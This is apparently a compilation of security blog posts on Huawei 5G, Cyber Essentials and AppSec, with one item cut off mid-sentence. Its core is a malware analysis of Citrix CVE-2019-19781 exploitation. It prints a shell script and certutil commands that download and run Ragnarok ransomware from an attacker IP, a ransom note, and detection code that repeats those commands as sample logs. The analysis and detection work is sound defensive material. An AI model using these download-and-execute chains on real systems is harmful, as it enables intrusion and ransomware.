The National Cyber Security Centre (NCSC) published a document which says UK networks will have three years to comply with the caps on the use of Huawei's equipment.

"Huawei is reassured by the UK government's confirmation that we can continue working with our customers to keep the 5G rollout on track. It gives the UK access to world-leading technology and ensures a competitive market," the firm's UK chief Victor Zhang said in a statement.

UK security professionals have reported significant concerns around how digital transformation projects and the implementation of 5G will affect their risk posture. 89% of UK businesses said they have concerns around the implementation of emerging technologies and essential digital transformation projects and almost four in ten (38%) expect digital transformation and 5G to offer cybercriminals more effective and more destructive methods of achieving their nefarious goals, according to research from VMWare Carbon Black.

A10 Networks' VP of Strategy, Gunter Reiss, said: “The global dispute over whether tech giant Huawei should be used in national 5G networks has created a lot of geopolitical conversations around the 5G build-out, security to Critical National Infrastructure, and generally whether certain vendors should be included or excluded. However, operators need to base their decisions not on these opinions but on technology – the strength, innovation and security capabilities. With the massive increases in bandwidth, number of devices predicted to be on these networks and the growing security requirements, the technology being used must meet these needs.”


A Security Compromise on Economic Grounds

"This is a good compromise between alleviating 'security' concerns and making sure that the 5G UK market is not harmed," commented Dimitris Mavrakis, a telecoms analyst at ABI Research. Previously I posted about the national security vs economic argument which has been behind the UK government's decision; see The UK Government Huawei Dilemma and the Brexit Factor.

The next casualty of cyberwar could be your business

How do you prepare for truly unknown cyberattacks or threats to physical security?

It’s a question that we all have to ask in the aftermath of the missile strikes exchanged with Iran. As many are (rightly) concerned with the possibility of a traditional war starting in the Middle East, it is likely that retaliation will happen over cyberspace, putting all our networks and infrastructure at risk.

What’s most worrisome about these initial strikes is the lack of transparency. Most members of Congress had no idea the attack was imminent, and when they were briefed, many complained that their questions went unanswered.

If Congress isn’t being told what is happening, you can be sure the CISOs of major corporations aren’t being told or aware of any incidents that could have life-altering physical and cyber consequences. So with no possible coordination, how can you possibly be prepared?


NIST Tests Forensic Methods for Getting Data From Damaged Mobile Phones

Criminals sometimes damage their mobile phones in an attempt to destroy evidence. They might smash, shoot, submerge or cook their phones, but forensics experts can often retrieve the evidence anyway. Now, researchers at the National Institute of Standards and Technology (NIST) have tested how well these forensic methods work. A damaged phone might not power on, and the data port might not work, so experts use hardware and software tools to directly access the phone’s memory chips. These include hacking tools, albeit ones that may be lawfully used as part of a criminal investigation. Because

How will Cyber Essentials changes affect you?

In a move to standardise the requirements for Cyber Essentials certification, from 1st April 2020 the IASME Consortium will be the National Cyber Security Centre’s sole Cyber Essentials Partner (formerly accreditation body), and the other four accreditation bodies will no longer be involved in the scheme.

The National Cyber Security Centre (NCSC) is the authority for appointing Cyber Essentials accreditation bodies on behalf of HMG.

How will this affect certification applications/renewals?

  • All existing certification bodies will continue to operate as normal until 31 March 2020.
  • Applicants should apply for new certification/renewal under the current scheme’s requirements through any existing certification body.
  • Certificates issued from applications that were submitted before 1 April 2020 will be valid for at least 12 months.
  • If you apply for new or renew your Cyber Essentials certification with your existing certification body by 31 March 2020, you will have until 30 June 2020 to complete the application process (provided the application was started by 31 March and is being actively progressed).
  • All existing structures that were put in place under the current scheme to obtain certification will remain valid until 31 March 2020.
  • Vulnerability scans that were required under CREST-accredited certification bodies will still be required for applications purchased before 31 March 2020.

From 1 April 2020, any organisation that wants to apply for Cyber Essentials or renew their certification will need to follow the new process as required by IASME.

What can you expect from the new process after 31 March 2020?

  • All certification processes will be standardised through IASME.
  • Vulnerability scans that were required by certain certification bodies will no longer form part of the requirements for Cyber Essentials basic certification.
  • All Cyber Essentials applications and renewals will need to be completed using the IASME self-assessment questionnaire.
  • The questionnaire requires applicants to answer open-ended questions in free text format.
  • All applications need to be manually reviewed by an assessor. The open-ended free text format could lead to a lengthier and more onerous certification review process than the existing CREST questionnaire.
  • All renewals administered through IASME will be treated similarly to new applications, meaning data for Cyber Essentials assessments will need to be entered from scratch.
  • IT Governance customers will still be able to access their completed Cyber Essentials applications in the IT Governance Cyber Essentials portal, but we will not be able to transfer any data to IASME.

We urge customers to renew their certifications before 31 March 2020, even if it means bringing forward their certifications, to avoid having to start the process from scratch.

What about Cyber Essentials Plus?

  • All Cyber Essentials Plus applications continue as normal until 31 March 2020.
  • From 1 April, Cyber Essentials basic certification will be a prerequisite of Cyber Essentials Plus. Customers will be required to achieve the basic level first, followed by the Cyber Essentials Plus element, which must be completed within a mandatory three-month period and could incur additional charges.

Save yourself the hassle by securing early certification renewal

As we are a CREST-accredited certification body, you can fast-track your renewal through the IT Governance online portal before 31 March and reap the benefits of a simple, fast and convenient process.

Renewing your certification with IT Governance before the IASME-controlled process begins has many benefits.

Get certified or renew your certification now. 

The post How will Cyber Essentials changes affect you? appeared first on IT Governance UK Blog.

Boris Johnson gets final warning with Huawei 5G verdict imminent

Former senior government figures voice security fears as PM chairs meeting of NSC

Former ministers have sounded their final warnings to Boris Johnson about the Chinese telecoms firm Huawei ahead of his expected decision on whether it will play a part in the UK’s 5G network.

The prime minister will chair a meeting of the national security council (NSC) later on Tuesday before making a judgment on the firm’s future in the country after months of concern around security, including from the US president, Donald Trump.

5G is the next generation mobile phone network and it promises much higher connection speeds, lower latency (response times) and to be more reliable than the creaking 4G networks we have now.

Huawei is a Chinese telecoms company founded in 1987. US officials believe it poses a security risk because the Chinese government will make the firm engineer backdoors in its technology, through which information could be accessed by Beijing. Donald Trump has banned US companies from sharing technology with Huawei and has been putting pressure on other nations to follow suit.


Forrester Study on the Benefits of Cloud vs. On-Premises AppSec

Veracode recently commissioned Forrester Consulting to conduct research on the Total Economic Impact™ of using a cloud-based application security (AppSec) solution versus an on-premises solution. To collect information on the benefits and risks associated with the solutions, Forrester interviewed four customers who have used Veracode as well as a variety of on-premises application security solutions. The data revealed four business benefits and the average cost savings associated with using SaaS-based AppSec:

Improved speed to scale saves 200 hours annually

On average, it takes approximately 33 hours to set up an AppSec server and 216 hours for annual maintenance. By using a cloud-based solution, like Veracode, organizations avoid server costs, which improves speed to scale and saves more than $1.3 million over three years.

Faster time to market leads to additional $888,000 in annual profit

Veracode Greenlight is a unique tool that performs security scans as developers are coding. By catching flaws during development, code is updated faster, and products and updates are typically released three months sooner than if conducting post-deployment scans. Gaining an additional three months of profit on every application could translate to millions saved over the course of a few years.

Annual legacy application costs of $1.86 million are avoided

The study found that Veracode costs 20 percent less to operate than on-premises solutions. This means that by moving all legacy applications to a cloud-based solution, an organization would have lower operating costs, which could save, on average, almost $3.9 million over the course of three years.

Real-time flaw identification saves $4.4 million over three years

Veracode Greenlight not only leads to increased profits, it also leads to increased productivity for developers. Since they are able to see flaws while coding, they can make real-time edits, eliminating rework down the line. And the more productive developers are when eliminating flaws, the more productive the security teams are. This could lead to an average productivity savings of approximately $4.4 million over three years.

Download the full study, SaaS vs. On-premises: The Total Economic Impact™ of Veracode’s SaaS-based Application Security Platform, for a detailed analysis of cost savings and business benefits. In the report, you will also find additional baseline benefits attributed to using Veracode, as well as a comprehensive overview of the platform.

Weekly Update 175


Alright, let me get this off my chest first - I've totally lost it with these bloody Instamics. I've had heaps of dramas in the past with recordings being lost and the first time I do a 3-person weekly update only 2 of them recorded (mine being the exception). I was left with a zero-byte file on my unit which we tried to recover to no avail. It's not just that; the mobile app is clunky AF (Scott was demonstrating how many times he had to mash a button on his just to get it to connect to a mic), firmware updates require an install on the PC (which at least previously, was unsigned code loaded over HTTP via an IP address), the levels on them are unpredictable and somehow Scott ended up with a blinky light on his last week. So this video has ended up with only Scott's and Ari's mics working and me in the background along with a whole lot of unwanted conference scene noise - sorry! Anyone got a recommendation for a portable audio recorder that can take a few lav mic inputs?

Moving on, we've just wrapped up NDC Security in Oslo where Scott, Ari and I have all delivered sessions of one kind or another. HIBP also hit the 3M subscriber mark this week and Scott is lamenting how slow his browsing experience has become without his Pi-hole. Next week's update will come from London where I'll try and do a much better job of the audio before getting home and getting a decent recorder - get these recommendations in!


References

  1. Ari held a session on teaching kids to code (that's a link through to this week's blog post on what he covered in the session)
  2. We'll all be at NDC London next week (I'll be workshopping, Ari coding with kids and both Scott and I delivering more talks)
  3. Scott and I are both missing our Pi-holes (looking forward to getting home to a faster browsing experience!)
  4. Sponsored by: SecurityFWD. A brand new YouTube show from Varonis. Watch Episode 1: How Far can Wi-Fi Travel?

Nice Try: 501 (Ransomware) Not Implemented

An Ever-Evolving Threat

Since January 10, 2020, FireEye has tracked extensive global exploitation of CVE-2019-19781, which continues to impact Citrix ADC and Gateway instances that are unpatched or do not have mitigations applied. We previously reported on attackers’ swift attempts to exploit this vulnerability and the post-compromise deployment of the previously unseen NOTROBIN malware family by one threat actor. FireEye continues to actively track multiple clusters of activity associated with exploitation of this vulnerability, primarily based on how attackers interact with vulnerable Citrix ADC and Gateway instances after identification.

While most of the CVE-2019-19781 exploitation activity we’ve observed to this point has led to the deployment of coin miners or most commonly NOTROBIN, recent compromises suggest that this vulnerability is also being exploited to deploy ransomware. If your organization is attempting to assess whether there is evidence of compromise related to exploitation of CVE-2019-19781, we highly encourage you to use the IOC Scanner co-published by FireEye and Citrix, which detects the activity described in this post.

Between January 16 and 17, 2020, FireEye Managed Defense detected the IP address 45[.]120[.]53[.]214 attempting to exploit CVE-2019-19781 at dozens of FireEye clients. When successfully exploited, we observed impacted systems executing the cURL command to download a shell script with the file name ld.sh from 45[.]120[.]53[.]214 (Figure 1). In some cases this same shell script was instead downloaded from hxxp://198.44.227[.]126:81/citrix/ld.sh.


Figure 1: Snippet of ld.sh, downloaded from 45.120.53.214

The shell script, provided in Figure 2, first checks for the python2 binary (Note: Python is only pre-installed on Citrix Gateway 12.x and 13.x systems) and then downloads two additional files into a temporary directory: piz.Lan, an XOR-encoded data blob, and de.py, a Python script. The script then changes permissions on de.py and executes it, which in turn decodes and decompresses piz.Lan. Finally, the script cleans up the initial staging files and executes scan.py, an additional script we will cover in more detail later in the post.

#!/bin/sh
rm $0
if [ ! -f "/var/python/bin/python2" ]; then
echo 'Exit'
exit
fi

mkdir /tmp/rAgn
cd /tmp/rAgn

curl hxxp://45[.]120[.]53[.]214/piz.Lan -o piz.Lan
sleep 1
curl hxxp://45[.]120[.]53[.]214/de -o de.py
chmod 777 de.py
/var/python/bin/python2 de.py

rm de.py
rm piz.Lan
rm .new.zip
cd httpd
/var/python/bin/python2 scan.py -n 50 -N 40 &

Figure 2: Contents of ld.sh, a shell-script to download additional tools to the compromised system

piz.Lan -> .new.zip

Armed with the information gathered from de.py, we turned our attention to decoding and decompressing “.new.zip” (MD5: 0caf9be8fd7ba5b605b7a7b315ef17a0). Inside, we recovered five files, listed in Table 1:

Filename               | Functionality          | MD5
-----------------------|------------------------|---------------------------------
x86.dll                | 32-bit Downloader      | 9aa67d856e584b4eefc4791d2634476a
x64.dll                | 64-bit Downloader      | 55b40e0068429fbbb16f2113d6842ed2
scan.py                | Python socket scanner  | b0acb27273563a5a2a5f71165606808c
xp_eternalblue.replay  | Exploit replay file    | 6cf1857e569432fcfc8e506c8b0db635
eternalblue.replay     | Exploit replay file    | 9e408d947ceba27259e2a9a5c71a75a8

Table 1: Contents of the ZIP file ".new.zip", created by the script de.py

The purpose of the ZIP contents became clear through analysis of scan.py, a Python scanning script that also automates exploitation of any vulnerable system(s) it identifies. Our initial analysis showed that this script was a combination of functions from multiple open source projects or scripts. As one example, the replay files, which were either adapted or copied directly from this public GitHub repository, were used in the Install_Backdoor function, as shown in Figure 3:


Figure 3: Snippet of scan.py showing usage of EternalBlue replay files

This script also had multiple functions checking whether an identified system is 32- vs. 64-bit, as well as raw shell code to step through an exploit. The exploit_main function, when called, would appropriately choose between 32- or 64-bit and select the right DLL for injection, as shown in Figure 4.


Figure 4: Snippet of scan.py showing instructions to deploy 32- or 64-bit downloaders

I Call Myself Ragnarok

Our analysis continued by examining the capabilities of the 32- and 64-bit DLLs, aptly named x86.dll and x64.dll. At only 5,120 bytes each, these binaries performed the following tasks (Figure 5 and Figure 6):

  1. Download a file named patch32 or patch64 (matching the operating system bitness) from a hard-coded URL using certutil, a native tool used as part of Windows Certificate Services (categorized as Technique T1105 within MITRE’s ATT&CK framework).
  2. Execute the downloaded binary since1969.exe, located in C:\Users\Public.
  3. Delete the URL from the current user’s certificate cache.

certutil.exe -urlcache -split -f hxxp://45.120.53[.]214/patch32 C:/Users/Public/since1969.exe
cmd.exe /c C:/Users/Public/since1969.exe
certutil -urlcache -f hxxp://45.120.53[.]214/patch32 delete

Figure 5: Snippet of strings from x86.dll

certutil.exe -urlcache -split -f hxxp://45.120.53[.]214/patch64 C:/Users/Public/since1969.exe
cmd.exe /c C:/Users/Public/since1969.exe
certutil -urlcache -f hxxp://45.120.53[.]214/patch64 delete

Figure 6: Snippet of strings from x64.dll

Although neither patch32 nor patch64 were available at the time of analysis, FireEye identified a file on VirusTotal with the name avpass.exe (MD5: e345c861058a18510e7c4bb616e3fd9f) linked to the IP address 45[.]120[.]53[.]214 (Figure 7). This file is an instance of the publicly available Meterpreter backdoor and was uploaded on November 12, 2019. Additional analysis confirmed that this binary communicated with 45[.]120[.]53[.]214 over TCP port 1234.


Figure 7: VirusTotal graph showing links between resources hosted on or communicating with 45.120.53.214

Within the avpass.exe binary, we found an interesting PDB string that provided more context about the tool’s author: “C:\Users\ragnarok\source\repos\avpass\Debug\avpass.pdb”. Utilizing ragnarok as a keyword, we pivoted and were able to identify a separate copy of since1969.exe (MD5: 48452dd2506831d0b340e45b08799623) uploaded to VirusTotal on January 23, 2020. The binary’s compilation timestamp of January 16, 2020, aligns with our earliest detections associated with this threat actor.

Further analysis and sandboxing of this binary brought all the pieces together—this threat actor may have been attempting to deploy ransomware aptly named ‘Ragnarok’. We’d like to give credit to this Tweet from Karsten Hahn, who identified Ragnarok-related artifacts on January 17, 2020, again aligning with the timeframe of our initial detection. Figure 8 provides a snippet of files created by the binary upon execution.


Figure 8: Ragnarok-related ransomware files

The ransom note dropped by this ransomware, shown in Figure 9, points to three email addresses.

6.it's wise to pay as soon as possible it wont make you more losses

the ransome: 1 btcoin for per machine,5 bitcoins for all machines

how to buy bitcoin and transfer? i think you are very good at googlesearch

asgardmaster5@protonmail[.]com
ragnar0k@ctemplar[.]com
j.jasonm@yandex[.]com

Attention:if you wont pay the ransom in five days, all of your files will be made public on internet and will be deleted

Figure 9: Snippet of ransom note dropped by “since1969.exe”

Implications

FireEye continues to observe multiple actors who are currently seeking to take advantage of CVE-2019-19781. This post outlines one threat actor who is using multiple exploits to take advantage of vulnerable internal systems and move laterally inside the organization. Based on our initial observations, the ultimate intent may have been the deployment of ransomware, using the Gateway as a central pivot point.

As previously mentioned, if you suspect your Citrix appliances may have been compromised, we recommend using the tool FireEye released in partnership with Citrix.

Detect the Technique

Aside from CVE-2019-19781 itself, FireEye detects the activity described in this post across our platforms, including named detections for Meterpreter and EternalBlue. Table 2 lists several specific detection names to assist in detecting this activity.

Signature Name
---------------------------------------
CERTUTIL.EXE DOWNLOADER (UTILITY)
CURL Downloading Shell Script
ETERNALBLUE EXPLOIT
METERPRETER (Backdoor)
METERPRETER URI (STAGER)
SMB - ETERNALBLUE

Table 2: FireEye Detections for activity described in this post
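As an added example (not FireEye's IOC Scanner and not code from this post), the Python below flags the two download-and-execute sequences described above in process command-line records: the curl and python2 stages of ld.sh on a Citrix appliance, and the certutil download / execute / cache-delete sequence from x86.dll and x64.dll, tying the execution of since1969.exe back to the certutil download on the same host. The '<host> <command line>' record format, the host names and the rule names are assumptions; the sample records are constructed from the commands shown in the post.

```python
import re
from dataclasses import dataclass
from urllib.parse import urlparse

# Network indicators quoted in the post (kept defanged, as the post writes them).
DEFANGED_IOCS = ["45[.]120[.]53[.]214", "198[.]44[.]227[.]126"]


def refang(value: str) -> str:
    """Turn a defanged indicator or URL ('hxxp', '[.]') back into its real form."""
    return value.replace("[.]", ".").replace("hxxp", "http")


IOC_IPS = {refang(ioc) for ioc in DEFANGED_IOCS}

# Stage patterns taken from the post: certutil download and cache cleanup
# (x86.dll / x64.dll) and the curl and python2 stages of ld.sh.
CERTUTIL_DL = re.compile(
    r"certutil(?:\.exe)?\s+-urlcache\s+-split\s+-f\s+(\S+)\s+(\S+)", re.I)
CERTUTIL_DEL = re.compile(r"certutil(?:\.exe)?\s+-urlcache\s+-f\s+(\S+)\s+delete", re.I)
CURL_DL = re.compile(r"\bcurl\s+(\S+)\s+-o\s+(\S+)")
PY2_SCRIPT = re.compile(r"/var/python/bin/python2\s+(\S+\.py)")


@dataclass
class Finding:
    host: str
    line_no: int
    rule: str
    detail: str


def _url_host(url: str) -> str:
    return urlparse(refang(url)).hostname or ""


def _norm_path(text: str) -> str:
    return text.lower().replace("\\", "/")


def scan_log(lines):
    """Walk '<host> <command line>' records (assumed format) and return Findings."""
    findings = []
    dropped = {}  # host -> paths certutil wrote, so execution is tied to the download
    for n, raw in enumerate(lines, 1):
        host, _, cmd = raw.strip().partition(" ")
        if not cmd:
            continue

        m = CERTUTIL_DL.search(cmd)
        if m:
            url, path = m.groups()
            dropped.setdefault(host, set()).add(_norm_path(path))
            rule = "CERTUTIL.EXE DOWNLOADER"
            if _url_host(url) in IOC_IPS:
                rule += " (known IOC)"
            findings.append(Finding(host, n, rule, f"{url} -> {path}"))
            continue

        m = CERTUTIL_DEL.search(cmd)
        if m:
            findings.append(Finding(host, n, "CERTUTIL URL CACHE CLEANUP", m.group(1)))
            continue

        # Execution of a file that certutil dropped earlier on the same host.
        for path in dropped.get(host, ()):
            if path in _norm_path(cmd):
                findings.append(Finding(host, n, "CERTUTIL DROPPER EXECUTED", path))
                break

        m = CURL_DL.search(cmd)
        if m:
            url, out = m.groups()
            rule = "CURL DOWNLOADING FILE"
            if _url_host(url) in IOC_IPS:
                rule += " (known IOC)"
            findings.append(Finding(host, n, rule, f"{url} -> {out}"))
            continue

        m = PY2_SCRIPT.search(cmd)
        if m:
            findings.append(Finding(host, n, "PYTHON2 SCRIPT ON CITRIX APPLIANCE", m.group(1)))
    return findings


# Constructed sample records (host names and format are assumptions); the commands
# mirror ld.sh and the strings from x86.dll / x64.dll shown in the post.
SAMPLE_LOG = [
    "citrix-gw01 curl hxxp://45[.]120[.]53[.]214/piz.Lan -o piz.Lan",
    "citrix-gw01 curl hxxp://45[.]120[.]53[.]214/de -o de.py",
    "citrix-gw01 /var/python/bin/python2 de.py",
    "citrix-gw01 /var/python/bin/python2 scan.py -n 50 -N 40",
    "win-fs02 certutil.exe -urlcache -split -f hxxp://45.120.53[.]214/patch64 C:/Users/Public/since1969.exe",
    "win-fs02 cmd.exe /c C:/Users/Public/since1969.exe",
    "win-fs02 certutil -urlcache -f hxxp://45.120.53[.]214/patch64 delete",
    "win-fs02 certutil.exe -encode secret.txt secret.b64",  # benign certutil use: must not fire
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f.host} line {f.line_no}: {f.rule} [{f.detail}]")
```

The benign certutil -encode record shows why the rules key on the -urlcache switches rather than on the binary name alone.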

Indicators

Table 3 provides the unique indicators discussed in this post.

Indicator Type | Indicator                         | Notes
---------------|-----------------------------------|----------------------
Network        | 45[.]120[.]53[.]214               |
Network        | 198[.]44[.]227[.]126              |
Host           | 91dd06f49b09a2242d4085703599b7a7  | piz.Lan
Host           | 01af5ad23a282d0fd40597c1024307ca  | de.py
Host           | bd977d9d2b68dd9b12a3878edd192319  | ld.sh
Host           | 0caf9be8fd7ba5b605b7a7b315ef17a0  | .new.zip
Host           | 9aa67d856e584b4eefc4791d2634476a  | x86.dll
Host           | 55b40e0068429fbbb16f2113d6842ed2  | x64.dll
Host           | b0acb27273563a5a2a5f71165606808c  | scan.py
Host           | 6cf1857e569432fcfc8e506c8b0db635  | xp_eternalblue.replay
Host           | 9e408d947ceba27259e2a9a5c71a75a8  | eternalblue.replay
Host           | e345c861058a18510e7c4bb616e3fd9f  | avpass.exe
Host           | 48452dd2506831d0b340e45b08799623  | since1969.exe
Email Address  | asgardmaster5@protonmail[.]com    | From ransom note
Email Address  | ragnar0k@ctemplar[.]com           | From ransom note
Email Address  | j.jasonm@yandex[.]com             | From ransom note

Table 3: Collection of IOCs from this blog post

Forrester Analysis on the State of Government Application Security: Government Must Make Significant Advances

In a recent report, The State of Government Application Security, 2020, Forrester analysts establish that governments are far behind other industries in critical areas of application protection. This finding, backed by the Forrester Analytics Global Business Technographics® Security Survey, 2019, is especially alarming given the amount of sensitive citizen data housed by government agencies. And, since applications are currently the most common breach vector, governments need to start investing heavily in application security (AppSec).

For starters, government agencies need to implement prerelease scans to reduce the remediation time of security flaws. By implementing prerelease scans, such as static analysis, flaws can be detected earlier in the development lifecycle. But it is not just a matter of running occasional prerelease scans. According to Veracode's State of Software Security Industry Snapshot, government agencies currently scan 90 percent of their applications 12 times a year, which equates to only once a month. Government agencies need to formulate an AppSec program with a regular cadence of frequent scans. Industries that scan applications more frequently find and remediate flaws faster and, as a result, carry less security debt.

It is also important that governments embrace DevSecOps practices. DevSecOps is a methodology that introduces collaboration between development, operations and security. Part of that collaboration is shifting security to the beginning of the development process, which saves time because flaws and vulnerabilities are recognised and addressed before deployment. But embracing DevSecOps is not just about adding manual prerelease scans; it is about properly implementing prerelease tools. Here are three things to consider:

  • Prepare a business case for prerelease testing of applications that is centered around citizen trust. Make the case for adopting dynamic, static, and software composition analysis based on increasing citizen trust and improving citizen experience. A data breach is a surefire way to erode citizen trust.
  • Automate prerelease scans whenever possible and integrate the scans with build tools like Jenkins or ticketing tools like Jira. Automation and integrations help you recognize the benefits of AppSec tests and speed up the remediation process.
  • Scan both in-house applications as well as third-party applications. If you neglect to scan third-party applications, an unidentified flaw could compromise your data and negatively affect your customer experience.
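As an added example of the second point (automating the scan and making its result gate the build), and not code from Veracode or Forrester: a small gate that reads a SARIF-shaped report from a static analysis run, keeps a baseline of when each finding was first seen, and fails the pipeline stage when a finding has been open longer than its severity allows. This is the "security debt" idea above expressed as a rule. The report, the baseline, the fingerprint scheme, the SLA_DAYS policy and the use of a "security-severity" property to carry the score are all assumptions made for the example; real scanners put severity in different places and the mapping would need adjusting.

```python
"""Added example (not Veracode's or Forrester's code): an age-based build gate for
static analysis findings, driven by a constructed SARIF-shaped report."""
import json
import sys
from datetime import date

# Days a finding of each severity may stay open before the build fails.
# Critical blocks at once; low never blocks. Policy assumption: tune to your programme.
SLA_DAYS = {"critical": 0, "high": 7, "medium": 30}


def severity_bucket(score: float) -> str:
    """Map a CVSS-style security-severity score to a policy bucket."""
    if score >= 9.0:
        return "critical"
    if score >= 7.0:
        return "high"
    if score >= 4.0:
        return "medium"
    return "low"


def fingerprint(result: dict) -> str:
    """Stable identity for a finding across builds: rule, file and line (assumed scheme)."""
    loc = result["locations"][0]["physicalLocation"]
    return f'{result["ruleId"]}|{loc["artifactLocation"]["uri"]}|{loc["region"]["startLine"]}'


def evaluate(sarif_text: str, baseline: dict, today: date):
    """Gate a SARIF report against SLA_DAYS.

    baseline maps fingerprint -> ISO date the finding was first seen (kept between builds,
    e.g. as a CI artifact). Returns (blocking findings, updated baseline). Findings that no
    longer appear are dropped, so a fixed flaw that returns later starts a fresh clock.
    """
    report = json.loads(sarif_text)
    updated = {}
    blocking = []
    for run in report["runs"]:
        for result in run["results"]:
            fp = fingerprint(result)
            first_seen = baseline.get(fp, today.isoformat())
            updated[fp] = first_seen
            sev = severity_bucket(float(result["properties"]["security-severity"]))
            limit = SLA_DAYS.get(sev)
            if limit is None:
                continue
            age = (today - date.fromisoformat(first_seen)).days
            if age >= limit:
                blocking.append({"fingerprint": fp, "severity": sev, "age_days": age})
    return blocking, updated


def _result(rule, score, uri, line):
    return {"ruleId": rule, "properties": {"security-severity": str(score)},
            "locations": [{"physicalLocation": {"artifactLocation": {"uri": uri},
                                                "region": {"startLine": line}}}]}


# Constructed SARIF-shaped report and baseline, not the output of any real scanner.
SAMPLE_SARIF = json.dumps({"runs": [{"tool": {"driver": {"name": "example-sast"}}, "results": [
    _result("sql-injection", 9.1, "src/db.py", 42),      # critical, new this build
    _result("path-traversal", 7.5, "src/files.py", 17),  # high, new: inside its 7-day window
    _result("xss-reflected", 5.4, "src/views.py", 88),   # medium, open since December
    _result("weak-random", 2.0, "src/token.py", 9),      # low: reported but never blocks
]}]})
SAMPLE_BASELINE = {
    "xss-reflected|src/views.py|88": "2019-12-01",   # 50 days old on 2020-01-20
    "hardcoded-secret|src/old.py|3": "2019-11-01",   # fixed since; drops out of the baseline
}


def run_sample(today=date(2020, 1, 20)):
    return evaluate(SAMPLE_SARIF, SAMPLE_BASELINE, today)


if __name__ == "__main__":
    blocking, _new_baseline = run_sample()
    for b in blocking:
        print(f"BLOCK {b['severity']:8} age={b['age_days']:3}d {b['fingerprint']}")
    sys.exit(1 if blocking else 0)   # a non-zero exit is what fails the pipeline stage
```

In a Jenkins or similar pipeline the scan stage would write the report, this script would run against it with the previous build's baseline, and the updated baseline would be archived for the next run; the ticketing integration mentioned above would hang off the same list of blocking findings.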

Although government agencies are currently falling behind on these vital security measures, with the right products and a little guidance they can catch up quickly. Read the full Forrester report for details on the state of AppSec in government agencies.

Cyber News Rundown: Cannabis User Data Breach

Reading Time: ~ 2 min.

Point-of-Sale Breach Targets U.S. Cannabis Industry

Late last month, researchers discovered a database owned by the company THSuite that appeared to contain information belonging to roughly 30,000 cannabis customers in the U.S. Because the database required no authentication, the researchers were able to view contact information as well as cannabis purchase receipts, including price and quantity, and even scanned copies of employee and government IDs. Though many of the records were for recreational users, medical patients were also involved in the breach, which could prompt additional investigations regarding HIPAA violations.

Ransomware Attack Shuts Down Florida Libraries

At least 600 computers belonging to the library system of Volusia County, Florida were taken offline after falling victim to an unconfirmed ransomware attack. While the libraries were able to get 50 computers back up and running, many of their core functionalities are still offline for the time being. Though officials still have not confirmed that ransomware was the cause of the shutdown, the attack is similar to ones targeting multiple California libraries less than a week earlier.

UK Government Allows Gambling Firms Access to Children’s Data

The Information Commissioner’s Office (ICO) was recently informed of a data breach that could affect nearly 28 million students in the UK. A gambling firm was apparently given access to a Department for Education database by a third-party vendor to complete age and ID verification, though it is unclear just how much information they were gathering. Both firms and the Department for Education have begun examining this breach to determine if this requires a full GDPR investigation.

International Law Enforcement Efforts Take Down Breach Dealer Site

In a combined effort from multiple law enforcement agencies in the U.S. and Europe, two individuals who operated a site that sold login credentials from thousands of data breaches were arrested. Immediately following the arrests, the domain for WeLeakInfo was taken down and all related computers were seized by police, who then promptly put up an official press release and request for any additional info on the site or owners. WeLeakInfo, which boasted access to over 12 billion records, was originally hosted by a Canadian company, but was quick to employ Cloudflare to continue their nefarious dealings privately.

UPS Store Exposes Customer Data

Roughly 100 UPS Stores across the U.S. fell victim to a phishing attack that compromised sensitive customer information over the last four months. This incident stems from a malicious phishing attack that allowed some individuals to compromise store email accounts, which then allowed access to any documents that had been exchanged between the accounts and customers, from passports and IDs to financial info. Fortunately, UPS has already begun contacting affected customers and is offering two years of credit and identity monitoring.

The post Cyber News Rundown: Cannabis User Data Breach appeared first on Webroot Blog.

ISO 27001 management review: a practical guide

As part of their ISO 27001 compliance, organisations must conduct management reviews to address any emerging information security trends and to ensure that their ISMS (information security management system) works as intended.

Unfortunately, there’s a mistaken belief that the review is only necessary as part of the certification audit. That couldn’t be further from the truth, as we explain in this blog.

The purpose of the ISO 27001 management review

Management reviews give senior staff the opportunity to evaluate the effectiveness of their organisation’s ISMS and make any changes that could boost its ability to protect sensitive information.

The criteria for an effective ISMS will have been addressed as part of your work conforming with Clause 4 of ISO 27001, which covers the organisation and its context, the requirements of interested parties, the scope of the ISMS and the ISMS itself.

The management review also gives you the opportunity to inform senior staff of any changes or revisions that have been made to the day-to-day workings of the ISMS.

What the management review should cover

Clause 9.3 of ISO 27001 outlines what your management review should cover.

Your first order of business is to revisit any ongoing actions that you decided upon in previous management reviews.

For example, you might have requested statistical analysis related to certain practices, or decided to adjust a process. Now is the time to check them and get further comment.

Next, you should discuss any external or internal issues that are relevant to the ISMS.

‘Internal and external issues’ is a phrase introduced in Clause 4.1 of ISO 27001, and refers to things that could affect your sensitive information.

Internal issues include things related to information assets, people, products and systems, whereas external issues might include political problems, economic fluctuations and new technologies.

The third item on your agenda is the overall performance of your ISMS. You should focus on:

  • Areas of the ISMS that aren’t working as intended;
  • Actions you’ve taken to address previously identified weaknesses;
  • The ongoing monitoring of your ISMS’s performance;
  • Audit results and the fulfilment of information security objectives;
  • Feedback from interested parties;
  • Results of your risk assessment and the status of the risk treatment plan; and
  • Opportunities for continual improvement.

Who should attend the management review?

As the name suggests, senior management should play a key role. This might take the form of an ‘ISMS board’ – i.e. a group of senior staff that is tasked with overseeing information security issues.

The ISMS board generally includes the CISO and other executives, along with department heads who oversee the handling of large volumes of sensitive information.

How often should management reviews be conducted?

ISO 27001 requires management reviews to be held at planned intervals; in practice that means at least once a year, and more frequently if there are any material changes that could affect your ISMS.

However, we suggest holding meetings more regularly than this, because you’ll have a lot to cover and will find that information security issues evolve quickly.

How frequently you hold meetings is up to you – but we think quarterly or monthly get-togethers are more suitable.

Getting the most out of the management review

Here are some tips to help you get started:

  1. Keep attendees to a minimum

You don’t need to fill the room to get as many opinions as possible. You’re better off with a small group of people whose insight you value.

Attendees can consult with colleagues outside of the meeting if they need further advice or information – and you can invite people as needed – but this isn’t the time for an organisation-wide discussion.

  2. Keep management reviews and management meetings separate

Senior staff probably already meet up on a regular basis to address the day-to-day operations of the organisation, but don’t fall into the trap of thinking you can slide your management reviews into these meetings.

If you do, you’ll find that issues are conflated or that information security concerns are pushed aside in favour of more urgent business matters.

  3. Keep minutes

ISO 27001 requires you to document the content and results of your management reviews, so someone will need to keep minutes.

This isn’t simply to prove that you’ve been holding meetings. It helps remind you of any topics that came up and the decisions you made regarding them.

  4. Provide a summary

Attendees often find it helpful to have a brief round-up of what was discussed in addition to the minutes, which can be hard to navigate if you’re looking for a summary of a specific issue.

Summaries are best produced soon after the meeting has finished, so the person producing it still has all the information fresh in their mind. They can then circulate the write-up in an email.

